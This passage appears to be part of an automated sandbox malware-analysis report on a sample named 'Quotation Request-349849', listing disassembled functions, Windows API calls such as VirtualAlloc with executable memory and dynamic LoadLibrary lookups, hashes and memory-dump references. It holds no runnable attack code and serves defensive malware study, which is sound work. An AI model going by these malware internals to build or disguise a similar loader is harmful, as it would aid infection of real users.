                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 3f412a81426931104580092f8fd37cf3eee9ff7bf366b3672a853303378ebf91
                                                      • Instruction ID: 30e27951d5f28c1a6df15b6d64fe0a8f4818bb24f9ee24a0f352c4f3f8deb06d
                                                      • Opcode Fuzzy Hash: 3f412a81426931104580092f8fd37cf3eee9ff7bf366b3672a853303378ebf91
                                                      • Instruction Fuzzy Hash: C0415E7690121CAFCF10DFA4CD85ADEBBB8FB49700F004099FA85B7181DA716E85CBA1
                                                      Function 00857946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0085F910,00000000,?,?,?,?), ref: 008579DF
                                                      • GetWindowLongW.USER32 ref: 008579FC
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00857A0C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: b84a162a3f6c918c864e4a4d933cad158025c3092bd7a47de7b8c046ddd40605
                                                      • Instruction ID: 2c7442c0dd54e8f999350c8bb50c527735438effb69a8994208b80480895fb39
                                                      • Opcode Fuzzy Hash: b84a162a3f6c918c864e4a4d933cad158025c3092bd7a47de7b8c046ddd40605
                                                      • Instruction Fuzzy Hash: 7231FE31204206ABDB118E38DC05BEA7BA9FF04325F248725F975E32E1D734ED558B60
                                                      Function 008573D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00857461
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00857475
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00857499
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: 54fa9c865c0c0c9a9d0a296624155fa260828493ba143f8556601813c6e4ae49
                                                      • Instruction ID: 9db5238440b5879642c2a39ce5716acbf54d7c556265906fc603a923e497f05e
                                                      • Opcode Fuzzy Hash: 54fa9c865c0c0c9a9d0a296624155fa260828493ba143f8556601813c6e4ae49
                                                      • Instruction Fuzzy Hash: D321BF32600218BBDF118EA4DC46FEA3BAAFB48725F114214FE15AB190DA75AC55CBA0
                                                      Function 00857B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00857C4A
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00857C58
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00857C5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: 519652f24c90492f443ccd32ada631d60c3735a1a40a2da3a97a6a8107df43ee
                                                      • Instruction ID: d7be1c722a9ddbde5b86bc90bbf1e9bf4a88f1697bed53bc1e593685806e1f18
                                                      • Opcode Fuzzy Hash: 519652f24c90492f443ccd32ada631d60c3735a1a40a2da3a97a6a8107df43ee
                                                      • Instruction Fuzzy Hash: B9215AB1604208AFDB11EF28DC81CA737ECFB5A3A5B544059FA01DB3A1CA31EC058B60
                                                      Function 00856CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00856D3B
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00856D4B
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00856D70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 267a37bc33d5b79679ccf4ddc7e97d358b5464bb090abaf2c1c62ceb48d851ef
                                                      • Instruction ID: 86020c3803209aad3f2953d6d4d489a935e8e5597b0decc68836c58ce0d7675c
                                                      • Opcode Fuzzy Hash: 267a37bc33d5b79679ccf4ddc7e97d358b5464bb090abaf2c1c62ceb48d851ef
                                                      • Instruction Fuzzy Hash: 4121C232600118BFDF118F54CC45FBB3BBAFF89761F418124FA459B1A0D6719C658BA0
                                                      Function 0085770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00857772
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00857787
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00857794
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 981564ed63a72d914866a1c2344f3bad2b453d25ccdba6282013268de9439636
                                                      • Instruction ID: 3f44146367c06171ee9c328c3745b55931f7412691264b18eff27bc26831ed94
                                                      • Opcode Fuzzy Hash: 981564ed63a72d914866a1c2344f3bad2b453d25ccdba6282013268de9439636
                                                      • Instruction Fuzzy Hash: 0A11E372244208BAEF245F65EC05FEB77A9FF88B65F114229FA41E6190D672E811CB20
                                                      Function 007D4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,007D4B83,?), ref: 007D4C44
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4C56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: 7a7c47a2b4bc3f8a85bb3bfb021f1564d127b7c2cf149e20330eb2ea923f4be9
                                                      • Instruction ID: f1d22d2fd3658135f2f463132c8e3d15ca48d41ba612b9cbef4960b5ab2ce40d
                                                      • Opcode Fuzzy Hash: 7a7c47a2b4bc3f8a85bb3bfb021f1564d127b7c2cf149e20330eb2ea923f4be9
                                                      • Instruction Fuzzy Hash: 85D01270550B13CFD7205F31D90861677E5BF05352B11883A95A5D6661E678D480C661
                                                      Function 007D4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,007D4BD0,?,007D4DEF,?,008952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4C11
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4C23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: ff8e14c7389e7d6667583556da663323d10bf7bdca990695c049d8fc009f48b4
                                                      • Instruction ID: bd84e1a5d2849720068154f53288d8bf6fee9e39af3ffdd68095064afd905ce5
                                                      • Opcode Fuzzy Hash: ff8e14c7389e7d6667583556da663323d10bf7bdca990695c049d8fc009f48b4
                                                      • Instruction Fuzzy Hash: CCD01230551B13CFD7206F71D948606B6E5FF09352B118C3A9595D6651E7B8D480CB61
                                                      Function 00850DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00851039), ref: 00850DF5
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00850E07
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: 58fd9b5caf3ff4ff81c5004827d1fc4bda98ff773052da5d1fbae9e317532556
                                                      • Instruction ID: f6cfef2339ec9c7e363b60432a7fd061fdac59edbbf7eca7c7e5abc2afe29c67
                                                      • Opcode Fuzzy Hash: 58fd9b5caf3ff4ff81c5004827d1fc4bda98ff773052da5d1fbae9e317532556
                                                      • Instruction Fuzzy Hash: 66D08230440B22CFC322AF70C80928272E5FF00393F248C2ED9D2C2250E6B8D8908A40
                                                      Function 008490E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00848CF4,?,0085F910), ref: 008490EE
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00849100
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: 447a533dafdd24a4d90d95d3d69748c4acbc7f043eb4b30393951ba346eff006
                                                      • Instruction ID: c97724c998dc6066430fef67ebea924f8efa6d1877d65f57513a8d0538aac9d1
                                                      • Opcode Fuzzy Hash: 447a533dafdd24a4d90d95d3d69748c4acbc7f043eb4b30393951ba346eff006
                                                      • Instruction Fuzzy Hash: 7DD01734550B13CFDB30AF31D81860776E5FF05392B12887AEAD6D6A91FA78C880CB91
                                                      Function 00811714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: 7122b20967dfab60c9943f483a5b50d5ca295529ee1edbfe62a6075d9cea6a6c
                                                      • Instruction ID: 77c3a4656e17c62b060bc6bf23e84e5da3516655153e7950b51aacd37799b07d
                                                      • Opcode Fuzzy Hash: 7122b20967dfab60c9943f483a5b50d5ca295529ee1edbfe62a6075d9cea6a6c
                                                      • Instruction Fuzzy Hash: 1AD0127580510DEACF019690988C8F9737CFF08305F140852F702D2684E22987D4D721
                                                      Function 0082717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53be13f92b62323735c3052337a8296531693415e681670e5cc8115339fde928
                                                      • Instruction ID: 66b6d038cdd7030522be064797edc13b335f9c4b7a36c0e4827e5a83c0cd903b
                                                      • Opcode Fuzzy Hash: 53be13f92b62323735c3052337a8296531693415e681670e5cc8115339fde928
                                                      • Instruction Fuzzy Hash: D6C17F74A0422AEFCB14DFA5D884EAEBBB5FF48714B148598E805EB351D730ED81DB90
                                                      Function 0084E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0084E0BE
                                                      • CharLowerBuffW.USER32(?,?), ref: 0084E101
                                                        • Part of subcall function 0084D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0084D7C5
                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0084E301
                                                      • _memmove.LIBCMT ref: 0084E314
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                      • String ID:
                                                      • API String ID: 3659485706-0
                                                      • Opcode ID: 1775547d8be8920326d1318c551de36c059db221e89fff7a0635e274f845eeee
                                                      • Instruction ID: cadb66f254ab2966096b016aaca5f1be3a38d49de95032fa241a28a987586dbc
                                                      • Opcode Fuzzy Hash: 1775547d8be8920326d1318c551de36c059db221e89fff7a0635e274f845eeee
                                                      • Instruction Fuzzy Hash: 39C13471A083058FC714DF28C480A6ABBE4FF89718F04896EF999DB351D774E946CB82
                                                      Function 00848093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 008480C3
                                                      • CoUninitialize.OLE32 ref: 008480CE
                                                        • Part of subcall function 0082D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0082D5D4
                                                      • VariantInit.OLEAUT32(?), ref: 008480D9
                                                      • VariantClear.OLEAUT32(?), ref: 008483AA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: 32d9744076d78ea173f4ee6b1b1433aa330240b826eb0fade1711a664f23c1dc
                                                      • Instruction ID: 40e67888d78703fe4c91a5cc351cacd570b967b05a78d07e4f204507c0f54dbf
                                                      • Opcode Fuzzy Hash: 32d9744076d78ea173f4ee6b1b1433aa330240b826eb0fade1711a664f23c1dc
                                                      • Instruction Fuzzy Hash: E1A12475604705DFCB10DF64C885A2AB7E4FF89754F044459FA969B3A2CB34ED05CB82
                                                      Function 00827530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00862C7C,?), ref: 008276EA
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00862C7C,?), ref: 00827702
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0085FB80,000000FF,?,00000000,00000800,00000000,?,00862C7C,?), ref: 00827727
                                                      • _memcmp.LIBCMT ref: 00827748
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: 6998d0a23e2c1bda4dacaf033a15a5841336abfd20be9e4d44deded78fcbb892
                                                      • Instruction ID: 11eba07d87b862e23d3b348d2ca9916fe9bc6ce03eae76d00429d6ffa70802cb
                                                      • Opcode Fuzzy Hash: 6998d0a23e2c1bda4dacaf033a15a5841336abfd20be9e4d44deded78fcbb892
                                                      • Instruction Fuzzy Hash: B0812D71A00119EFCB04DFA4C984EEEB7B9FF89315F204158E505EB250DB71AE46CB60
                                                      Function 0082687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: 4e104898179bf0b0c128185f6e17aa7dc2eb5956a4fd4298fc30b90c94fd329f
                                                      • Instruction ID: b95cd96717be1e18545b47ac5f8836acb8de45b50785ca1b89ac2e3276181ad5
                                                      • Opcode Fuzzy Hash: 4e104898179bf0b0c128185f6e17aa7dc2eb5956a4fd4298fc30b90c94fd329f
                                                      • Instruction Fuzzy Hash: 015191747003259BDB24AF69E4A5A2AB7A5FF44314F20C81FE586DB291EA74D8E08701
                                                      Function 008597F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(0154D798,?), ref: 00859863
                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00859896
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00859903
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: de9e5c6c4f835d476356f78841718fc4716dfd2395282beb8cb31279c7cfd6a8
